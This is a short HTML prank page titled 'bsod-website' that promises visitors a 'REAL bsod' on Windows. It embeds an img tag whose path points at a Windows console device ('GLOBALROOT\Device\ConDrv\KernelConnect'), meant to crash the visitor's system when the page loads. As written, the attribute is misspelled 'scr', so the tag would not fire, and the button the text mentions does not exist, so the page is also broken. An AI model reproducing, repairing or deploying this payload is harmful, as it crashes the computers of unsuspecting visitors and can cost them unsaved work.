<!DOCTYPE html>
<html>
<head>
  <title>bsod-website</title>
  <style>
    body {
      background-color: #000;
      color: #fff;
      font-family: Arial, sans-serif;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    h1 {
      color: #ff0000;
    }
    p {
      font-style: italic;
    }
    button {
      background-color: #ff0000;
      color: #fff;
      border: none;
      padding: 10px 20px;
      border-radius: 5px;
      margin-top: 20px;
      cursor: pointer;
    }
    button:hover {
      background-color: #990000;
    }
  </style>
</head>
<body>
  <h1>The bsod-website</h1>
  <p>by clicking on the gimme bsod button you gonna get a REAL bsod only works in windows</p>
  <img class="bsod" scr="file:////./GLOBALROOT\Device\ConDrv\KernelConnect" />
</body>
</html>
